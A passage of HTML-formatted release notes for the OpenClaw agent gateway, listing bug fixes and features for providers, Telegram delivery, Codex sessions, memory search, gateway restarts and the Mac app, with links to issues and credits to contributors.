<li>Providers/Google: preserve and recover Gemini 3 tool-call thought signatures during native replay so function-calling turns no longer fail with missing <code>thought_signature</code> 400s. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336919838" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72879" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72879/hovercard" href="https://github.com/openclaw/openclaw/issues/72879">#72879</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4416318334" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80358" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80358/hovercard" href="https://github.com/openclaw/openclaw/pull/80358">#80358</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/abnershang/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/abnershang">@abnershang</a>.</li>
<li>Telegram: skip transcript-only delivery mirrors and gateway-injected rows when resolving latest assistant text, preventing retained previews from replacing final replies with stale fragments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463981517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83159" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83159/hovercard" href="https://github.com/openclaw/openclaw/issues/83159">#83159</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4465564203" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83362" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83362/hovercard" href="https://github.com/openclaw/openclaw/pull/83362">#83362</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Memory/QMD: keep lexical search on raw hyphenated queries while normalizing semantic QMD sub-searches, avoiding fallback to the builtin index for dashed identifiers and dates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4435810897" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81328" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81328/hovercard" href="https://github.com/openclaw/openclaw/issues/81328">#81328</a>.</li>
<li>Memory-core: distinguish sqlite-vec load failures from missing semantic vector embeddings in degraded <code>memory index</code> warnings, so vector recall diagnostics point at unresolved dimensions instead of blaming sqlite-vec when the store is ready. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364260496" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75624" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75624/hovercard" href="https://github.com/openclaw/openclaw/issues/75624">#75624</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463181130" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83056" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83056/hovercard" href="https://github.com/openclaw/openclaw/pull/83056">#83056</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xuruiray/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xuruiray">@xuruiray</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Noah3521/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Noah3521">@Noah3521</a>.</li>
<li>Agents/subagents: preserve sandbox-peer controller ownership while routing completion announcements back to the originating run session, keeping subagent control and completion delivery scoped correctly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415216120" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/80201/hovercard" href="https://github.com/openclaw/openclaw/issues/80201">#80201</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4415551739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/80242" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/80242/hovercard" href="https://github.com/openclaw/openclaw/pull/80242">#80242</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jerry-Xin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jerry-Xin">@Jerry-Xin</a>.</li>
<li>Gateway: continue restarting remaining channels when one hot-reload channel restart fails, while still reporting aggregate reload failure and rolling back plugin pre-replace stops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4463173969" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83054" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83054/hovercard" href="https://github.com/openclaw/openclaw/issues/83054">#83054</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>Gateway/plugins: bind admin HTTP RPC dispatch to the accepting gateway instance so multi-gateway processes cannot execute plugin HTTP control-plane calls against another live gateway. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466988696" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83486" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83486/hovercard" href="https://github.com/openclaw/openclaw/issues/83486">#83486</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466988915" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83487" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83487/hovercard" href="https://github.com/openclaw/openclaw/pull/83487">#83487</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/coygeek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/coygeek">@coygeek</a>.</li>
<li>Telegram: keep hot-reload restarts from marking polling accounts manually stopped and restart isolated ingress cleanly after worker shutdown, preserving Telegram replies across config reloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462834253" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83008" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83008/hovercard" href="https://github.com/openclaw/openclaw/issues/83008">#83008</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466042128" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83410" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83410/hovercard" href="https://github.com/openclaw/openclaw/pull/83410">#83410</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Telegram/Ollama: pass current Telegram image attachments into native PI/Ollama vision turns so live photo prompts reach Ollama as native images. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462984078" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83023" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83023/hovercard" href="https://github.com/openclaw/openclaw/issues/83023">#83023</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4467422495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83516" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83516/hovercard" href="https://github.com/openclaw/openclaw/pull/83516">#83516</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Gateway/secrets: split the lightweight secrets runtime state and auth-store cache from the full secrets runtime and take a startup fast path when the gateway startup config has no SecretRef values, speeding up secrets startup while preserving cleanup and refresh semantics.</li>
<li>Codex app-server: rotate oversized native Codex threads before resume and cap dynamic tool-result text entering native Codex sessions, preventing stale oversized context from surviving OpenClaw compaction. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462638811" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82981" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82981/hovercard" href="https://github.com/openclaw/openclaw/pull/82981">#82981</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hansolo949/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hansolo949">@hansolo949</a>.</li>
<li>Gateway/restart: drain pending replies and active chat runs during restart shutdown before sockets and channels close, aborting timed-out chat runs through the normal cleanup path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292354940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69121" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69121/hovercard" href="https://github.com/openclaw/openclaw/pull/69121">#69121</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexlomt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexlomt">@alexlomt</a>.</li>
<li>Agents/Codex: use the Codex runtime context window for OpenAI-model preflight compaction and memory flush checks, so GPT-5.5 Codex sessions compact before hitting the smaller native context limit. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462658403" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82982/hovercard" href="https://github.com/openclaw/openclaw/issues/82982">#82982</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</li>
<li>QA-Lab: clean orphaned gateway temp roots when a suite parent exits and wait on gateway plus transport readiness after config restarts, reducing stale <code>qa-channel</code> noise from interrupted runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4249469816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65506" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65506/hovercard" href="https://github.com/openclaw/openclaw/issues/65506">#65506</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/100yenadmin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/100yenadmin">@100yenadmin</a>.</li>
<li>QA-Lab: wake qa-bus long polls that arrive with stale future cursors after a bus restart, preserving reconnect readiness for harness clients. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4268454103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67142" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67142/hovercard" href="https://github.com/openclaw/openclaw/pull/67142">#67142</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hxy91819/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hxy91819">@hxy91819</a>.</li>
<li>QA-Lab: stage Multipass transfer scripts under OpenClaw's preferred temp root instead of raw OS temp paths, keeping the VM runner inside temp-path guardrails. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4236737157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64098" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/64098/hovercard" href="https://github.com/openclaw/openclaw/pull/64098">#64098</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ImLukeF/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ImLukeF">@ImLukeF</a>.</li>
<li>Agents/replies: keep surviving reply media and append a warning when other media references fail, so partial media normalization no longer drops failures silently. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jerry-Xin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jerry-Xin">@Jerry-Xin</a>.</li>
<li>Config/models: accept <code>thinkingFormat: "together"</code> in model compat config so Together routes can opt into the Together-specific thinking response shape.</li>
<li>Plugins/tokenjuice: bump the bundled tokenjuice runtime to 0.7.1, bringing Codex hook approval compatibility, pre-tool command wrapping fixes, and Rolldown/Vitest output compaction improvements into the OpenClaw plugin.</li>
<li>Agents/OpenAI: stop post-processing GPT-5 final replies with hardcoded brevity caps, preserving full channel responses instead of appending synthetic ellipses, and log when strict-agentic GPT-5 execution activates. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462335362" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82910" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82910/hovercard" href="https://github.com/openclaw/openclaw/issues/82910">#82910</a>.</li>
<li>Mac app: refine the Settings General and Connection panes with cleaner status panels, card rows, and a single native titlebar sidebar toggle.</li>
<li>Agents/media: deliver failed async image, music, and video generation completions directly when requester-session completion handoff fails, so channel users see provider errors instead of silent fallback stalls.</li>
<li>Browser/CDP: keep loopback proxy bypass active across both <code>NO_PROXY</code> casings and redact home-relative Chrome MCP profile paths in attach-failure diagnostics.</li>
<li>Agents/music: steer song, jingle, beat, anthem, and instrumental requests toward <code>music_generate</code> audio creation instead of lyric-only replies, and reserve <code>lyrics</code> for exact sung words.</li>
<li>Codex app-server: record native Codex tool calls and results into trajectory artifacts so debug/trajectory exports capture the full Codex-native tool history, not just OpenClaw-bridged turns. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</li>
<li>Codex/app-server: keep bound conversation sessions on the owning agent runtime so native Codex control and follow-up turns do not fall back to the default agent client. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462465085" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82954" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82954/hovercard" href="https://github.com/openclaw/openclaw/issues/82954">#82954</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462724002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82993" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82993/hovercard" href="https://github.com/openclaw/openclaw/pull/82993">#82993</a>)</li>
<li>CLI/infer: run gateway model probes in fresh explicit sessions so one-shot provider checks do not inherit default agent transcript state. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462127302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82861" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82861/hovercard" href="https://github.com/openclaw/openclaw/pull/82861">#82861</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kaspre/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kaspre">@Kaspre</a>.</li>
<li>Providers/Together: send video-generation requests to Together's v2 video API even when shared text-model config still points at the v1 base URL. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462711627" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82992/hovercard" href="https://github.com/openclaw/openclaw/pull/82992">#82992</a>)</li>
<li>Browser CLI: preserve browser-level options on nested commands, skip option values during lazy command registration, and keep long-running wait/download/dialog hooks open for their advertised wait window.</li>
<li>CLI/sessions: accept <code>openclaw sessions list</code> as an alias for <code>openclaw sessions</code>, matching other list-style commands. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432233621" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81139" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81139/hovercard" href="https://github.com/openclaw/openclaw/issues/81139">#81139</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432597965" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81163" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81163/hovercard" href="https://github.com/openclaw/openclaw/pull/81163">#81163</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/YB0y/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/YB0y">@YB0y</a>.</li>
<li>Channels/stream previews: widen compact progress draft lines and cut prose at word boundaries while preserving command/path suffixes, with <code>streaming.progress.maxLineChars</code> for channel-specific tuning.</li>
<li>CLI/plugins: have <code>openclaw plugins doctor</code> warn when a configured runtime needs a missing owner plugin, sharing the same install mapping as <code>openclaw doctor --fix</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4435782026" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81326" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/81326/hovercard" href="https://github.com/openclaw/openclaw/issues/81326">#81326</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4443400168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/81674" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/81674/hovercard" href="https://github.com/openclaw/openclaw/pull/81674">#81674</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Zavianx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Zavianx">@Zavianx</a>.</li>
<li>Agents/Codex: route OpenAI runs that resolve to <code>openai-codex</code> through the Codex provider and bootstrap OpenClaw's stored OAuth profile into the Codex harness when the harness owns transport, so <code>openai/*</code> model refs no longer fail with <code>No API key found for openai-codex</code> despite an existing Codex OAuth profile. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462142665" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82864" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82864/hovercard" href="https://github.com/openclaw/openclaw/pull/82864">#82864</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ragesaq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ragesaq">@ragesaq</a>.</li>
<li>Agents/ACP: distinguish prompt-submitted and runtime-active child stalls from true interactive waits, including redacted proxy-env diagnostics for Codex ACP no-output runs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069428847" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44810" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44810/hovercard" href="https://github.com/openclaw/openclaw/issues/44810">#44810</a>.</li>
<li>Agents/memory: explain that memory-triggered compaction exposes only <code>read</code> and append-only <code>write</code> when configured core tools are unavailable in <code>tools.allow</code> warnings. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462438972" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82941" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82941/hovercard" href="https://github.com/openclaw/openclaw/issues/82941">#82941</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>Agents/OpenAI: preserve deterministic tool payload ordering for prompt-cache reuse across OpenAI Responses and chat completions calls. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462435142" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82940/hovercard" href="https://github.com/openclaw/openclaw/pull/82940">#82940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a>.</li>
<li>ACP/Codex: honor terminal ACP turn results so failed Codex/acpx runs are not recorded as successful after only progress text. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4409392717" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/79522" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/79522/hovercard" href="https://github.com/openclaw/openclaw/issues/79522">#79522</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dudaefj/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dudaefj">@dudaefj</a>.</li>
<li>Telegram: warn when a media group drops photos that fail to download, including albums where every photo is skipped. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144617570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55216" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55216/hovercard" href="https://github.com/openclaw/openclaw/issues/55216">#55216</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462674675" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82987" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82987/hovercard" href="https://github.com/openclaw/openclaw/pull/82987">#82987</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eldar702/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eldar702">@eldar702</a>.</li>
<li>Agents/skills: apply the full effective tool policy pipeline to inline <code>command-dispatch: tool</code> skill dispatch before owner-only filtering, preserving configured allow, deny, sandbox, sender, group, and subagent restrictions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4392543885" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78525" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78525/hovercard" href="https://github.com/openclaw/openclaw/pull/78525">#78525</a>)</li>
<li>Codex: avoid spawning native hook relay subprocesses for post-tool/finalize events with no registered hook handlers while preserving pre-tool safety and approval relays. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4371228983" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76552/hovercard" href="https://github.com/openclaw/openclaw/issues/76552">#76552</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4386233442" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/78004" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/78004/hovercard" href="https://github.com/openclaw/openclaw/pull/78004">#78004</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/evgyur/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/evgyur">@evgyur</a>.</li>
<li>Channel accounts: keep top-level default channel accounts visible when named accounts are added alongside default credential material, so mixed legacy/new account configs keep resolving <code>default</code> instead of silently dropping it.</li>
<li>Agents/CLI: reject empty successful CLI subprocess replies as <code>empty_response</code> and keep them out of shared auth-profile health, so blank Claude CLI results no longer become green no-payload turns. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464556593" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83231" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/83231/hovercard" href="https://github.com/openclaw/openclaw/issues/83231">#83231</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4466129017" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83421" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83421/hovercard" href="https://github.com/openclaw/openclaw/pull/83421">#83421</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Codex/Telegram: synthesize native Codex tool progress from final turn snapshots so Telegram <code>/verbose</code> stays visible when command events arrive only at completion.</li>
<li>Codex/Telegram: deliver Codex verbose tool summaries in direct message-tool-only turns while suppressing message-send and activity-log noise. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4464160180" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83186" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83186/hovercard" href="https://github.com/openclaw/openclaw/pull/83186">#83186</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kurplunkin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kurplunkin">@kurplunkin</a>.</li>
<li>Mac app: make Channels settings open faster by deferring config-schema work, avoiding startup channel probes, caching decoded channel status rows, and showing only compact quick settings instead of the full generated channel schema.</li>
<li>Control UI: include the Control UI and Gateway protocol versions in protocol-mismatch errors so stale app/dashboard pairings identify which side needs rebuilding or restarting.</li>
<li>Gateway/protocol: restore Gateway WS protocol v4 and keep <code>message.action</code> room-event metadata on the existing <code>inboundTurnKind</code> wire field while preserving internal inbound-event classification.</li>
<li>Agents/tools: prefer non-webchat session-key routes when the message tool has stale webchat context, so message-tool-only replies keep delivering to the originating channel. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462346514" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82911" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82911/hovercard" href="https://github.com/openclaw/openclaw/issues/82911">#82911</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462785655" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/83004" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/83004/hovercard" href="https://github.com/openclaw/openclaw/pull/83004">#83004</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Channels: keep direct-message last-route writes on isolated <code>per-channel-peer</code> sessions instead of contaminating the agent main session with channel delivery context. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4030119907" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/36614" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/36614/hovercard" href="https://github.com/openclaw/openclaw/issues/36614">#36614</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aspenas/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aspenas">@aspenas</a>.</li>
<li>Mac app: move the Settings sidebar toggle into the native titlebar and tighten the General pane width.</li>
<li>Mac app: keep visited Settings panes mounted so switching tabs no longer blanks and reloads their content.</li>
<li>Mac app: make Config settings open from shallow schema lookups and load selected paths on demand instead of fetching and rendering the full generated config schema up front.</li>
<li>Codex: sanitize inline image payloads before Codex app-server and OpenAI Responses replay, and clear poisoned Codex thread bindings after invalid image errors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462171502" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82878" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82878/hovercard" href="https://github.com/openclaw/openclaw/issues/82878">#82878</a>.</li>
<li>Providers/GitHub Copilot: request identity-encoded Copilot API responses across token exchange, catalog, model calls, usage, and embeddings so compressed Business-account error payloads no longer reach JSON parsers as gzip bytes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462159211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82871" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/82871/hovercard" href="https://github.com/openclaw/openclaw/issues/82871">#82871</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tonyfe01/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tonyfe01">@tonyfe01</a>.</li>
<li>Telegram: redact nested raw-update identifiers and user metadata before verbose raw update logging, preserving useful update/message ids without exposing chat, user, command, or profile details. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4462443792" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/82945" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/82945/hovercard" href="https://github.com/openclaw/openclaw/pull/82945">#82945</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/galiniliev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/galiniliev">@galiniliev</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
